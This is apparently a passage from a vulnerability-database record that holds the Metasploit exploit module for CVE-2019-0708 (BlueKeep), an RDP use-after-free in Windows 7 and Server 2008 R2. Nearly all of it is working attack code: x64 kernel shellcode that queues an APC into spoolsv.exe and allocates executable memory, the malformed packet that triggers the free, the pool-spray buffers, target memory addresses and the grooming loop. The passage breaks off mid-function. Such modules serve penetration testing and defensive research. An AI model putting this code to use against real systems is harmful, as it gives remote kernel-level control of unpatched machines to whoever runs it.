EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. 
no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID 
Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. 
Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get 
the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n 
sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked 
system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # 
TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? 
(QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}, {"lastseen": "2021-03-02T04:33:23", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! 
If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2021-02-02T10:15:46", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. 
Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... 
should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n prepend Msf::Exploit::Remote::AutoCheck\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 
'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 
0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. 
However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the 
PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding 
